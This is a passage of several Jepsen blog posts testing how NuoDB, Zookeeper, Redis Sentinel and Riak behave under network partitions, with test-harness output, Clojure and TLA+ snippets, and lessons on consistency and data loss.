If partition resistance includes the possibility for a surviving subset of the chorus to sing on, then NUODB refutes the CAP theorem.

We know systems exist in which a surviving subset of nodes continue processing during a partition. They are consistent with the CAP theorem because in those systems (e.g. Zookeeper) some requests to non-failing nodes do not succeed. Claiming this “refutes the CAP theorem” is incoherent.

This isn’t getting us anywhere. To figure out how NuoDB actually behaves, we’ll need to set up a cluster and test it ourselves.

Operational notes

Setting up a NuoDB cluster turned out to be more difficult than I anticipated. For starters, there are race conditions in the cluster join process. Each node has a seed node to join to, which determines the cluster it will become a part of. If that seed is inaccessible at startup, the node will quietly become a part of a new, independent cluster–and will not, as far as I can tell, join the original cluster even if the node becomes accessible later. Consequently, performing a cold start is likely to result in several independent clusters, up to and including every node considering itself the sole node in its own cluster.

This is a catastrophic outcome: if any clients manage to connect to one of these isolated clusters, their operations will almost certainly disagree with the other clusters. You’ll see conflicting row values, broken primary keys, invalid foreign key relationships, and so on. I have no idea how you go about repairing that kind of damage without simply dropping all the writes on one side of the split-brain.

You can join a node to itself. This is easy to do accidentally if you, say, deploy the same seed node to every node’s configuration file. The consequences are… interesting.

There are also race conditions in database creation. For instance, if you create and delete the same simple table a few times in succession, you can back yourself into this corner, where you can neither use, delete, nor recreate a table, short of nuking the entire cluster:

nuodb-fail.png

I’ve talked with the NuoDB team about these bugs, and they’re working on fixing them. Hopefully they won’t be present in future releases.

Finally, be aware that restarting a crashed NuoDB node does not restore its transaction managers or storage managers; if you do a naive rolling restart, all the data vanishes. In my conversations with NuoDB’s engineering staff, it looks like this is actually intended behavior for their customers' use cases. The cluster also doesn’t set up failover replicas when nodes become unavailable, so it’s easy to accidentally lose all the storage nodes if your membership shifts. NuoDB plans to improve that behavior in future releases.

What happens during partition?

In This NuoDB test, we check the consistency of compare-and-set updates to a single cell, by having transactions compete at the SERIAL consistency level to read, update, and write a vector of numbers. Note that this test does not check multi-key linearizability, or, for that matter, exclude behaviors like P4 or P3.

During a partition, with the Java driver, you could see a variety of failure modes:

  • “Duplicate value in unique index SEQUENCES..PRIMARY_KEY”
  • End of stream reached
  • Broken pipe
  • Connection reset
  • Indefinite latency

And I do mean indefinite. I haven’t actually found an upper limit to how long NuoDB will block for. As far as I can tell, when a node is inaccessible, operations will queue up for as long as the partition lasts. Moreover, they block globally: no subset of the cluster, even though a fully connected majority component existed, responded during partition.

nuodb1.png

Perhaps because all operations are queued without timeout, it takes a long time for NuoDB latencies to recover after the partition resolves. In my tests, latencies continued to spike well into the 30-60 second range for as many as 1500 seconds after the partition ended. I haven’t found an upper limit for this behavior, but eventually, something somewhere must run out of ram.

nuodb2.png

Results

NuoDB typically acknowledged 55% of writes in my tests–most, but not all, writes made during the partition failed due to CaS conflict and were not retried after Jepsen’s internal timeout. The good news is that all acknowledged writes made at the SERIAL consistency level were present in the final dataset: no dropped writes. There were also a trivial fraction of false negatives, which is typical for most CP systems. This indicates that NUODB is capable of preserving some sort of linear order over CaS operations to a single cell, even in the presence of a partition.

Note that NuoDB isn’t fully CP, because it does not enforce serializability for all write operations–just “local transaction order”. I’m not exactly sure how the local orders interact, and whether there are practical scenarios which would violate serializability but be allowed by NuoDB’s local transaction invariants. So far I haven’t been able to construct a test to demonstrate the difference.

pushingoffforlater.jpg

Does NuoDB refute the CAP theorem? Of course it doesn’t. By deferring all operations until the partition resolves, NuoDB is not even close to available. In fact, it’s a good deal less available than more consistent systems: Zookeeper, for example, remains available on all nodes connected to a majority component. NuoDB is another example of the adage that systems which purport to be CA or CAP usually sacrifice availability or consistency when a partition does occur–and often in spectacular ways.

Blocking all writes during partition is, according to the NuoDB team, intended behavior. However, there is experimental liveness detection code in the most recent release, which will hopefully allow NuoDB to begin timing out requests to inaccessible nodes. I haven’t been able to test that code path yet, but future releases may enable it by default.

If you are considering using NuoDB, be advised that the project’s marketing and documentation may exceed its present capabilities. Try to enable the liveness detection code, and set up your own client timeouts to avoid propagating high latencies to other systems. Try to build backpressure hints into your clients to reduce the requests against NuoDB during failure; the latency storm which persists after the network recovers is proportional to the backlog of requests. Finally, be aware of the operational caveats mentioned earlier: monitor your nodes carefully, restart their storage and transaction managers as appropriate, and verify that newly started nodes have indeed joined the cluster before exposing them to clients.

Finally, I want to note (as always) that the presence of bugs does not mean that the NuoDB engineers are incompetent–in fact, I want to assert the opposite. In my discussions with the NuoDB team I’ve found them to be friendly, capable, aware of the product’s limitations, and doing their best to solve a difficult problem within constraints of time, budget, and complexity. Given time, I’m sure they’ll get past these initial hurdles. From one employee:

I only hope you’ll footnote that crazy CAP rambling with the disclaimer that no one at NuoDB today actually agrees with Jim’s comments in that thread.

In the next post, we’ll learn about Kafka 0.8’s proposed replication model.

In this Jepsen post, we’ll explore Zookeeper. Up next: NuoDB.

Zookeeper, or ZK for short, is a distributed CP datastore based on a consensus protocol called ZAB. ZAB is similar to Paxos in that it offers linearizable writes and is available whenever a majority quorum can complete a round, but unlike the Paxos papers, places a stronger emphasis on the role of a single leader in ensuring the consistency of commits.

Because Zookeeper uses majority quorums, in an ensemble of five nodes, any two can fail or be partitioned away without causing the system to halt. Any clients connected to a majority component of the cluster can continue to make progress safely. In addition, the linearizability property means that all clients will see all updates in the same order–although clients may drift behind the primary by an arbitrary duration.

This safety property comes at a cost: writes must be durably written to a disk log on a majority of nodes before they are acknowledged. In addition, the entire dataset must fit in memory. This means that Zookeeper is best deployed for small pieces of state where linearizability and high availability is critical. Often, ZK is used to track consistent pointers to larger, immutable data stored in a different (perhaps AP) system; combining the safety and scalability advantages of both. At the same time, this strategy reduces the availability for writes, since there are two systems to fail, and one of them (ZK) requires majority quorums.

ZNode linearizability

In this test, five clients use a Curator DistributedAtom to update a list of numbers. The list is stored as a single serialized znode, and updates are applied via a CaS loop: atomically reading, decoding, appending the appropriate number, enoding, and writing back iff the value has not changed.

(let [curator (framework (str (:host opts) ":2181") "jepsen") path "/set-app" state (distributed-atom curator path [])] (reify SetApp (setup [app] (reset!! state [])) (add [app element] (try (swap!! state conj element) ok (catch org.apache.zookeeper.KeeperException$ConnectionLossException e error))) (results [app] @state) (teardown [app] (delete! curator path)))))

Initially, the ZK leader is n1. During the test, we partition [n1 n2] away from [n3 n4 n5], which means the leader cannot commit to a majority of nodes–and consequently, writes immediately block:

zk1.png

After 15 seconds or so, a new leader is elected in the majority component, and writes may proceed again. However, only the clients which can see one of [n3 n4 n5] can write: clients connected to [n1 n2] time out while waiting to make contact with the leader:

zk2.png

When the partition is resolved, writes on [n1 n2] begin to succeed right away; the leader election protocol is stable, so there is no need for a second transition during recovery.

Consequently, in a short test (~200 seconds, ~70 second partition, evenly distributed constant write load across all nodes) ZK might offer 78% availability, asymptotically converging on 60% (3/5 nodes) availability as the duration of the partition lengthens. ZK has never dropped an acknowledged write in any Jepsen test. It also typically yields 0-2 false positives: likely due to writes proxied through n1 and n2 just prior to the partition, such that the write committed, but the acknowledgement was not received by the proxying node.

As with any experiment, we can only disconfirm hypotheses. This test demonstrates that in the presence of a partition and leader election, Zookeeper is able to maintain the linearizability invariant. However, there could be other failure modes or write patterns which would not preserve linearizability–I just haven’t been able to find them so far. Nonetheless, this is a positive result: one that all CP datastores should aim for.

Recommendations

Use Zookeeper. It’s mature, well-designed, and battle-tested. Because the consequences of its connection model and linearizability properties are subtle, you should, wherever possible, take advantage of tested recipes and client libraries like Curator, which do their best to correctly handle the complex state transitions associated with session and connection loss.

Also keep in mind that linearizable state in Zookeeper (such as leader election) does not guarantee the linearizability of a system which uses ZK. For instance, a cluster which uses ZK for leader election might allow multiple nodes to be the leader simultaneously. Even if there are no simultaneous leaders at the same wall-clock time, message delays can result in logical inconsistencies. Designing CP systems, even with a strong coordinator, requires carefully coupling the operations in the system to the underlying coordinator state.

Next up: NuoDB.

In response to my earlier post on Redis inconsistency, Antirez was kind enough to help clarify some points about Redis Sentinel's design.

First, I'd like to reiterate my respect for Redis. I've used Redis extensively in the past with good results. It's delightfully fast, simple to operate, and offers some of the best documentation in the field. Redis is operationally predictable. Data structures and their performance behave just how you'd expect. I hear nothing but good things about the clarity and quality of Antirez' C code. This guy knows his programming.

I think Antirez and I agree with each other, and we're both saying the same sorts of things. I'd just like to expand on some of these ideas a bit, and generalize to a broader class of systems.

First, the distributed system comprised of Redis and Redis Sentinel cannot be characterized as consistent. Nor can MongoDB with anything less than WriteConcern.MAJORITY, or MySQL with asynchronous replication, for that matter. Antirez writes:

What I'm saying here is that just the goal of the system is:

1) To promote a slave into a master if the master fails.
2) To do so in a reliable way.

Redis Sentinel does reliably promote secondaries into primaries. It is so good at this that it can promote two, three, or all of your secondaries into primaries concurrently, and keep them in that state indefinitely. As we've seen, having causally unconnected primaries in this kind of distributed system allows for conflicts–and since Redis Sentinel will destroy the state on an old primary when it becomes visible to a quorum of Sentinels, this can lead to arbitrary loss of acknowledged writes to the system.

Ok I just made clear enough that there is no such goal in Sentinel to turn N Redis instances into a distributed store,

If you use any kind of failover, your Redis system is a distributed store. Heck, reading from secondaries makes Redis a distributed store.

So you can say, ok, Sentinel has a limited scope, but could you add a feature so that when the master feels in the minority it no longer accept writes? I don't think it's a good idea. What it means to be in the minority for a Redis master monitored by Sentinels (especially given that Redis and Sentinel are completely separated systems)?

Do you want your Redis master stopping to accept writes when it is no longer able to replicate to its slaves?

Yes. This is required for a CP system with failover. If you don't do it, your system can and will lose data. You cannot achieve consistency in the face of a partition without sacrificing availability. If you want Redis to be AP, then don't destroy the data on the old primaries by demoting them. Preserve conflicts and surface them to the clients for merging.

You could do this as an application developer by setting every Redis node to be a primary, and writing a proxy layer which uses, say, consistent hashing and active anti-entropy to replicate writes between nodes. Take a look at Antirez's own experiments in this direction. If you want a CP system, you could follow Datomic's model and use immutable shared-structure values in Redis, combined with, say, Zookeeper for mutable state.

Why topology matters

Antirez recommends a different approach to placing Sentinels than I used in my Redis experiments:

… place your Sentinels and set your quorum so that you are defensive enough against partitions. This way the system will activate only when the issue is really the master node down, not a network problem. Fear data loss and partitions? Have 10 Linux boxes? Put a Sentinel in every box and set quorum to 8.

I… can't parse this statement in a way that makes sense. Adding more boxes to a distributed system doesn't reduce the probability of partitions–and more to the point, trying to determine the state of a distributed system from outside the system itself is fundamentally flawed.

I mentioned that having the nodes which determine the cluster state (the Sentinels) be separate from the nodes which actually perform the replication (the Redis servers) can lead to worse kinds of partitions. I'd like to explain a little more, because I'm concerned that people might actually be doing this in production.

In this image, S stands for Sentinel, R stands for a Redis server, and C stands for Client. A box around an R indicates that node is a primary, and where it is able to replicate data to a secondary Redis server, an arrow is shown on that path. Lines show open network connections, and the jagged border shows a network partition.

Sentinels separate from clients and servers

Let's say we place our sentinels on 3 nodes to observe a three-node cluster. In the left-hand scenario, the majority of Sentinels are isolated, with two servers, from the clients. They promote node 2 to be a new primary, and it begins replicating to node 3. Node 1, however, is still a primary. Clients will continue writing to node 1, even though a.) its durability guarantees are greatly diminished–if it dies, all writes will be lost, and b.) the node doesn't have a quorum, so it cannot safely accept writes. When the partition resolves, the Sentinels will demote node 1 to a secondary and replace its data with the copy from N2, effectively destroying all writes during the partition.

On the right-hand side, a fully connected group of Sentinels can only see one Redis node. It's not safe to promote that node, because it doesn't have a majority and servers won't demote themselves when isolated, but the sentinels do it anyway. This scenario could be safely available to clients because a majority is present, but Redis Sentinel happily creates a split-brain and obliterates the data on the first node at some later time.

Sentinels with clients

If you take Antirez' advice and colocate the sentinels with your clients, we can still get in to awful states. On the left, an uneven partition between clients and servers means we elect a minority Redis server as the primary, even though it can't replicate to any other nodes. The majority component of the servers can still accept writes, but they're doomed: when the clients are able to see those nodes again, they'll wipe out all the writes that took place on those 2 nodes.

On the right, we've got the same partition topology I demonstrated in the Redis post. Same deal: split brain means conflicting writes and throwing away data.

If you encounter intermittent or rolling partitions (which can happen in the event of congestion and network failover), shifting quorums coupled with the inability of servers to reason about their own cluster state could yield horrifying consequences, like every node being a primary at the same time. You might be able to destroy not only writes that took place during the partition, but all data ever written–not sure if the replication protocol allows this or if every node just shuts down.

Bottom line: if you're building a distributed system, you must measure connectivity in the distributed system itself, not by what you can see from the outside. Like we saw with MongoDB and Riak, it's not the wall-clock state that matters–it's the logical messages in the system. The further you get from those messages, the wider your windows for data loss.

It's not just Sentinel

I assert that any system which uses asynchronous primary-secondary replication, and can change which node is the primary, is inconsistent. Why? If you write an operation to the primary, and then failover occurs before the operation is replicated to the node which is about to become the new primary, the new primary won't have that operation. If your replication strategy is to make secondaries look like the current primary, the system isn't just inconsistent, but can actually destroy acknowledged operations.

Here's a formal model of a simple system which maintains a log of operations. At any stage, one of three things can happen: we can write an operation to the primary, replicate the log of the primary to the secondary, or fail over:

------------------------------ MODULE failover ------------------------------ EXTENDS Naturals, Sequences, TLC CONSTANT Ops \* N1 and N2 are the list of writes made against each node VARIABLES n1, n2 \* The list of writes acknowledged to the client VARIABLE acks \* The current primary node VARIABLE primary \* The types we allow variables to take on TypeInvariant == /\ primary \in {1, 2} /\ n1 \in Seq(Ops) /\ n2 \in Seq(Ops) /\ acks \in Seq(Ops) \* An operation is acknowledged if it has an index somewhere in acks. IsAcked(op) == \E i \in DOMAIN acks : acks[i] = op \* The system is *consistent* if every acknowledged operation appears, \* in order, in the current primary's oplog: Consistency == acks = SelectSeq((IF primary = 1 THEN n1 ELSE n2), IsAcked) \* We'll say the system is *potentially consistent* if at least one node \* has a superset of our acknowledged writes in order. PotentialConsistency == \/ acks = SelectSeq(n1, IsAcked) \/ acks = SelectSeq(n2, IsAcked) \* To start out, all oplogs are empty, and the primary is n1. Init == /\ primary = 1 /\ n1 = <<>> /\ n2 = <<>> /\ acks = <<>> \* A client can send an operation to the primary. The write is immediately \* stored on the primary and acknowledged to the client. Write(op) == IF primary = 1 THEN /\ n1' = Append(n1, op) /\ acks' = Append(acks, op) /\ UNCHANGED <<n2, primary>> ELSE /\ n2' = Append(n2, op) /\ acks' = Append(acks, op) /\ UNCHANGED <<n1, primary>> \* For clarity, we'll have the client issues unique writes WriteSomething == \E op \in Ops : ~IsAcked(op) /\ Write(op) \* The primary can *replicate* its state by forcing another node \* into conformance with its oplog Replicate == IF primary = 1 THEN /\ n2' = n1 /\ UNCHANGED <<n1, acks, primary>> ELSE /\ n1' = n2 /\ UNCHANGED <<n2, acks, primary>> \* Or we can failover to a new primary. Failover == /\ IF primary = 1 THEN primary' = 2 ELSE primary = 1 /\ UNCHANGED <<n1, n2, acks>> \* At each step, we allow the system to either write, replicate, or fail over Next == \/ WriteSomething \/ Replicate \/ Failover

This is written in the TLA+ language for describing algorithms, which encodes a good subset of ZF axiomatic set theory with first-order logic and the Temporal Law of Actions. We can explore this specification with the TLC model checker, which takes our initial state and evolves it by executing every possible state transition until it hits an error:

Invariant Consistency is violated.

This protocol is inconsistent. The fields in red show the state changes during each transition: in the third step, the primary is n2, but n2's oplog is empty, instead of containing the list <<2>>. In fact, this model fails the PotentiallyConsistent invariant shortly thereafter, if replication or a write occurs. We can also test for the total loss of writes; it fails that invariant too.

That doesn't mean primary-secondary failover systems must be inconsistent. You just have to ensure that writes are replicated before they're acknowledged:

\* We can recover consistency by making the write protocol synchronous SyncWrite(op) == /\ n1' = Append(n1, op) /\ n2' = Append(n2, op) /\ acks' = Append(acks, op) /\ UNCHANGED primary \* This new state transition satisfies both consistency constraints SyncNext == \/ \E op \in Ops : SyncWrite(op) \/ Replicate \/ Failover

And in fact, we don't have to replicate to all nodes before ack to achieve consistency–we can get away with only writing to a quorum, if we're willing to use a more complex protocol like Paxos.

The important bit

So you skimmed the proof; big deal, right? The important thing that it doesn't matter how you actually decide to do the failover: Sentinel, Mongo's gossip protocol, Heartbeat, Corosync, Byzantine Paxos, or a human being flipping the switch. Redis Sentinel happens to be more complicated than it needs to be, and it leaves much larger windows for write loss than it has to, but even if it were perfect the underlying Redis replication model is fundamentally inconsistent. We saw the same problem in MongoDB when we wrote with less than WriteConcern.MAJORITY. This affects asynchronous replication in MySQL and Postgres. It affects DRBD (yeaaaahhh, this can happen to your filesystem). If you use any of this software, you are building an asynchronous distributed system, and there are eventualities that have to be acknowledged.

Look guys, there's nothing new here. This is an old proof and many mature software projects (for instance, DRBD or RabbitMQ) explain the inconsistency and data-loss consequences of a partition in their documentation. However, not everyone knows. In fact, a good number of people seem shocked.

Why is this? I think it might be because software engineering is a really permeable field. You can start out learning Rails, and in two years wind up running four distributed databases by accident. Not everyone chose or could afford formal education, or was lucky enough to have a curmudgeonly mentor, or happened to read the right academic papers or find the right blogs. Now they might be using Redis as a lock server, or storing financial information in MongoDB. Is this dangerous? I honestly don't know. Depends on how they're using the system.

I don't view this so much as an engineering problem as a cultural one. Knives still come with sharp ends. Instruments are still hard for beginners to play. Not everything can or should be perfectly safe–or accessible. But I think we should warn people about what can happen, up front.

Tangentially: like many cultures, much of our collective understanding about what is desirable or achievable in distributed systems is driven by advertising. Yeah, MongoDB. That means you. ;-)

Bottom line

I don't mean to be a downer about all this. Inconsistency and even full-out data loss aren't the end of the world. Asynchronous replication is a good deal faster, both in bulk throughput and client latencies. I just think we lose sight, occasionally, of what that means for our production systems. My goal in writing Jepsen has been to push folks to consider their consistency properties carefully, and to explain them clearly to others. I think that'll help us all build safer systems. :)

Previously in Jepsen, we discussed Riak. Now we’ll review and integrate our findings.

This was a capstone post for the first four Jepsen posts; it is not the last post in the series. I’ve continued this work in the years since and produced several more posts.

We started this series with an open problem.

How do computers even work?

Notorious computer expert Joe Damato explains: “Literally no one knows.”

We’ve pushed the boundaries of our knowledge a little, though. By building a simple application which models a sequence of causally dependent writes, recording a log of that app’s view of the world, and comparing that log to the final state of the database, we were able to verify–and challenge–our assumptions about the behavior of various distributed systems. In this talk we discussed one particular type of failure mode: a stable network partition which isolated one or more primary nodes–and explored its consequences in depth.

Modeling failure modes
Unexpected consequences

In each case, the system did something… odd. Maybe we hadn’t fully thought through the consequences of the system, even if they were documented. Maybe the marketing or documentation were misleading, or flat-out lies. We saw design flaws, like the Redis Sentinel protocol. Some involved bugs, like MongoDB’s WriteConcern.MAJORITY treating network errors as successful acknowledgements. Other times we uncovered operational caveats, like Riak’s high latencies before setting up fallback vnodes. In each case, the unexpected behavior led to surprising new information about the challenge of building correct distributed systems.

In this series, we chose a simple network failure which we know happens to real production systems. The test encoded specific assumptions about concurrency, throughput, latency, timeout, error handling, and conflict resolution. The results demonstrate one point in a high-dimensional parameter space. The fraction of dropped writes in these Jepsen’s demos can vary wildly for all these reasons, which means we can’t make general assertions about how bad the possibility of write loss really is. Mongo could lose almost all your writes, or none at all. It completely depends on the nature of your network, application, server topology, hardware, load, and the failure itself.

To apply these findings to your systems–especially in fuzzy, probabilistic ways–you’ll need to measure your assumptions about how your system behaves. Write an app that hits your API and records responses. Cause some failures and see whether the app’s log of what happened lines up with the final state of the system. The results may be surprising.

Measurement isn’t something you do just once. Ideally, your production systems should be instrumented continuously for performance and correctness. Some of these failure modes leave traces you can detect.

Some people claim that partitions don’t happen to them. If you run in EC2 or other virtualized environments, noisy neighbors and network congestion/failures are a well-known problem. Running your own hardware doesn’t make you immune either: Amazon, with some of the best datacenter engineers on the planet, considers partitions such a major problem that they were willing to design and build Dynamo. You are probably not Amazon.

Even if your network is reliable, logical failures can be partitions, too. Nodes which become so busy they fail to respond to heartbeats are a common cause of failover. Virtual machines can do all kinds of weird things to your network and clocks. Restoring from a backup can look like a partition resolving. These failures are hard to detect, so many people don’t know they even occurred. You just… get slow for a while, or run across data corruption, weeks or years later, and wonder how what happened.

Aiming for correctness

We’ve learned a bunch of practical lessons from these examples, and I’d like to condense them briefly:

Network errors mean “I don’t know,” not “It failed.” Make the difference between success, failure, and indeterminacy explicit in your code and APIs. Consider extending consistency algorithms through the boundaries of your systems. Hand TCP clients ETags or vector clocks. Extend CRDTs to the browser itself.

Even well-known, widely deployed algorithms like two-phase commit have some caveats, like false negatives. SQL transactional consistency comes in several levels. You’re probably not using the stronger ones, and if you are, your code needs to handle conflicts. It’s not usually a big deal, but keep it on your mental checklist.

Certain problems are hard to solve well, like maintaining a single authoritative record of data with primary failover. Consistency is a property of your data, not of your nodes. Avoid systems which assume node consensus implies data consistency.

Wall clocks are only useful for ensuring responsiveness in the face of deadlock, and even then they’re not a positive guarantee of correctness. Our clocks were completely synchronized in this demo and we still lost data. Even worse things can happen if a clock gets out of sync, or a node pauses for a while. Use logical clocks on your data. Distrust systems which rely on the system time, unless you’re running GPS or atomic clocks on your nodes. Measure your clock skew anyway.

Avoid home-grown distributed algorithms. Where correctness matters, rely on techniques with a formal proof and review in the literature. There’s a huge gulf between theoretically correct algorithm and living breathing software–especially with respect to latency–but a buggy implementation of a correct algorithm is typically better than a correct implementation of a terrible algorithm. Bugs you can fix. Designs are much harder to re-evaluate.

Choose the right design for your problem space. Some parts of your architecture demand consistency, and there is software for that. Other parts can sacrifice linearizability while remaining correct, like CRDTs. Sometimes you can afford to lose data entirely. There is often a tradeoff between performance and correctness: think, experiment, and find out.

Restricting your system with particular rules can make it easier to attain safety. Immutability is an incredibly useful property, and can be combined with a mutable CP data store for powerful hybrid systems. Use idempotent operations as much as possible: it enables all sorts of queuing and retry semantics. Go one step further, if practical, and use full CRDTs.

Preventing write loss in some weakly consistent databases, like Mongo, requires a significant latency tradeoff. It might be faster to just use Postgres. Sometimes buying ridiculously reliable network and power infrastructure is cheaper than scaling out. Sometimes not.

Replication between availability zones or between data centers is much more likely to fail than a rack or agg switch in your DC. Microsoft estimates their WAN links offer 99.5% availability, IIRC, and their LANs at 99.95%. Design your system accordingly.

Embracing failure

Hakuna my data

All this analysis, measuring, and designing takes hard work. You may not have the money, experience, hardware, motivation, or time. Every system entails risk, and not quantifying that risk is a strategy in itself.

With that in mind, consider allowing your system to drop data. Spew data everywhere and repair it gradually with bulk processes. Garbage-collect structures instead of ensuring their correctness every time. Not everyone needs correct behavior right now. Some people don’t ever need correct behavior. Look at the Facebook feed, or Twitter’s DM light.

Code you can reason about is better than code you can’t. Rely on libraries written and tested by other smart people to reduce the insane quantity of stuff you have to understand. If you don’t get how to test that your merge function is associative, commutative, and idempotent, maybe you shouldn’t be writing your own CRDTs just yet. Implementing two-phase commit on top of your database may be a warning sign.

Consistent, highly available systems are usually slow. There are proofs about the minimum number of network hops required to commit an operation in a CP system. You may want to trade correctness for performance for cost reasons, or to deliver a more responsive user experience.

I hope this work inspires you to test and improve your own distributed systems. The only reason I can talk about these mistakes is because I keep making them, over and over again. We’re all in this together. Good luck. :)

http://github.com/aphyr/jepsen

Thanks

Jepsen has consumed almost every hour of my life outside work for the last three months. I’m several hundred hours into the project now–and I couldn’t have done it without the help and encouragement of friends and strangers.

My sincerest thanks to my fellow Boundary alumni Dietrich Featherston and Joe Damato for the conversations which sparked this whole endeavor. Salvatore Sanfilippo, Jordan West, Evan Vigil-McClanahan, Jared Rosoff, and Joseph Blomstedt were instrumental in helping me understand how these databases actually work. Stephen Strowes and someone whose name I’ve sadly forgotten helped me demonstrate partitions on a local cluster in the first place. My deepest appreciation to the Postgres team, the Redis project, 10Gen and Basho for their support, and for making cool databases available to everyone for free.

Sean Cribbs and Reid Draper clued me in to CRDTs and the problems of LWW. Tom Santero and Mark Phillips invited me to give this talk at RICON East. Jepsen wouldn’t have existed without their encouragement, and I am continuously indebted to the pair. Zach Tellman, John Muellerleile, Josh O'Brien, Jared Morrow, and Ryan Zezeski helped refine my arguments and slides.

Hope I didn’t forget anyone–if so, please drop me a line. Thanks for reading.

Previously in Jepsen, we discussed MongoDB. Today, we’ll see how last-write-wins in Riak can lead to unbounded data loss.

If you like it then you Dynamo a ring on it

So far we’ve examined systems which aimed for the CP side of the CAP theorem, both with and without failover. We learned that primary-secondary failover is difficult to implement safely (though it can be done; see, for example, ZAB or Raft). Now I’d like to talk about a very different kind of database–one derived from Amazon’s Dynamo model.

Amazon designed Dynamo with the explicit goals of availability and partition tolerance–and partition-tolerant systems automatically handle node failure. It’s just a special kind of partition. In Dynamo, all nodes are equal participants in the cluster. A given object is identified by a key, which is consistently hashed into N slots (called “partitions”; not to be confused with a network partition) on a ring. Those N slots are claimed by N (hopefully distinct) nodes in the cluster, which means the system can, once data is replicated, tolerate up to N-1 node failures without losing data.

When a client reads from a Dynamo system, it specifys an R value: the number of nodes required to respond for a read to be successful. When it writes, it can specify W: the number of nodes which have to acknowledge the write. There’s also DW for “durable write”, and others. Riak has sometimes referred to these as “tunable CAP controls”: if you choose R=W=1, your system will be available even if all but one node fail–but you may not read the latest copy of data. If R + W is greater than N/2, you’re “guaranteed to read acknowledged writes”, with caveats. The defaults tend to be R=W=quorum, where quorum is N/2+1.

Dynamo handles partitions by healing the ring. Each connected set of machines establishes a set of fallback vnodes, to handle the portions of the ring which are no longer accessible. Once failover is complete, a Dynamo cluster split into two disjoint components will have two complete hash rings, and (eventually, as repair completes) 2 * N copies of the data (N in each component). When the partition heals, the fallback vnodes engage in hinted handoff, giving their data back to the original “primary” vnodes.

A totally connected Dynamo cluster
Two nodes are partitioned away

Since any node can accept writes for its portion of the keyspace, a Dynamo system can theoretically achieve 100% availability, even when the network fails entirely. This comes with two drawbacks. First, if no copy of a given object is available in an isolated set of nodes, that part of the cluster can accept writes for that object, but the first reads will return 404. If you’re adding items to a shopping cart and a partition occurs, your cart might appear to be empty. You could add an item to that empty cart, and it’d be stored, but depending on which side of the partition you talk to, you might see 20 items or just one.

When the partition heals, we have a new problem: it’s not clear which version of an object is authoritative. Dynamo employs a causality-tracing algorithm called vector clocks, which means it knows which copies of an object have been overwritten by updates, and which copies are actually conflicts–causally unconnected–due to concurrent writes.

Concurrent. We were talking about partitions, right? Two writes are concurrent if they happen in different components and can’t see each other’s changes, because the network didn’t let them communicate.

Well that’s interesting, because we’re also used to concurrency being a property of normal database systems. If two people read an object, then write it back with changes, those writes will also conflict. In a very real sense, partitions are just really big windows of concurrency. We often handle concurrent writes in relational databases with multi-version concurrency control or locks, but we can’t use locks here because the time horizons could be minutes or hours, and there’s no safe way to distribute a lock algorithm over a partition. We need a different approach. We need to be able to merge arbitrary conflicting objects for Dynamo to work. From the paper:

For instance, the application that maintains customer shopping carts can choose to “merge” the conflicting versions and return a single unified shopping cart. Despite this flexibility, some application developers may not want to write their own conflict resolution mechanisms and choose to push it down to the data store, which in turn chooses a simple policy such as “last write wins”.

Last write wins. That sounds like a timestamp. Didn’t we learn that Clocks Are Not To Be Trusted? Let’s try it and find out!

Riak with last-write-wins

Riak is an excellent open-source adaptation of the Dynamo model. It includes a default conflict resolution mode of last-write-wins, which means that every write includes a timestamp, and when conflicts arise, it picks the one with the higher timestamp. If our clocks are perfectly synchronized, this ensures we pick the most recent value.

To be clear: there are actually two settings in Riak which affect conflict resolution: lww=true, which turns off vector clock analysis entirely, and allow-mult=false, which uses vector clocks but picks the sibling with the highest timestamp. Allow-mult=false is safer, and that’s the setting I’m referring to by “last write wins.” All cases of data loss in this post apply to both settings, though.

First, let’s install Riak, join the nodes together, and tell the cluster to commit the change:

salticid riak.setup salticid riak.join salticid riak.commit

You can watch the logs with salticid riak.tail. Watch salticid riak.transfers until there are no handoffs remaining. The cluster is now in a stable state.

For this particular application we’ll be adding numbers to a list stored in a single Riak object. This is a typical use case for Dynamo systems–the atomic units in the system are keys, not rows or columns. Let’s run the app with last-write-wins consistency:

lein run riak lww-sloppy-quorumWrites completed in 5.119 seconds 2000 total 2000 acknowledged 566 survivors 1434 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ 1 2 3 4 6 8 ... 1990 1991 1992 1995 1996 1997 1.0 ack rate 0.717 loss rate
Can't read my / can't read my / no he can't read my / Daaata raaaace!

Riak lost 71% of acknowledged writes on a fully-connected, healthy cluster. No partitions. Why?

Remember how partitions and concurrency are essentially the same problem? Simultaneous writes are causally disconnected. If two clients write values which descend from the same object, Riak just picks the write with the higher timestamp, and throws away the other write. This is a classic data race, and we know how to fix those: just add a mutex. We’ll wrap all operations against Riak in a perfectly consistent, available distributed lock.

“But you can’t do that! That violates the CAP theorem!”

Clever girl. Jepsen lets us pretend, though:

lein run lock riak-lww-sloppy-quorumWrites completed in 21.475 seconds 2000 total 2000 acknowledged 2000 survivors All 2000 writes succeeded. :-D

Problem solved! No more write conflicts. Now let’s see how it behaves under a partition by running salticid jepsen.partition during a run:

237 :ok 242 :ok 247 :ok 252 :ok 257 :ok 262 timeout 85 :ok 204 timeout 203 timeout 106 :ok 209 timeout 267 timeout 90 :ok
And now you won't stop calling me / I'm kinda busy

The first thing you’ll notice is that our writes start to lag hard. Some clients are waiting to replicate a write to a majority of nodes, but one side of the partition doesn’t have a majority available. Even though Riak is an AP design, it can functionally become unavailable while nodes are timing out.

Those requests time out until Riak determines those nodes are inaccessible, and sets up fallback vnodes. Once the fallback vnodes are in place, writes proceed on both sides of the cluster, because both sides have a majority of vnodes available. This is by design in Dynamo. Allowing both components to see a majority is called a sloppy quorum, and it allows both components to continue writing data with full multi-node durability guarantees. If we didn’t set up fallback vnodes, a single node failure could destroy our data.

Before collecting results, let’s heal the cluster: salticid jepsen.heal. Remember to wait for Riak to recover, by waiting until salticid riak.transfers says there’s no data left to hand off.

Writes completed in 92.773 seconds 2000 total 1985 acknowledged 176 survivors 1815 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ 85 90 95 100 105 106 ... 1994 1995 1996 1997 1998 1999 6 unacknowledged writes found! ヽ(´ー`)ノ (203 204 218 234 262 277) 0.9925 ack rate 0.91435766 loss rate 0.00302267 unacknowledged but successful rate

91% data lost. This is fucking catastrophic, ladies.

And all the other nodes / Conflict with me

What happened? When the partition healed, Riak had two essentially two versions of the list: one from each side of the partition (plus some minorly divergent copies on each side). Last-write-wins means we pick the one with the higher timestamp. No matter what you do, all the writes from one side or the other will be discarded.

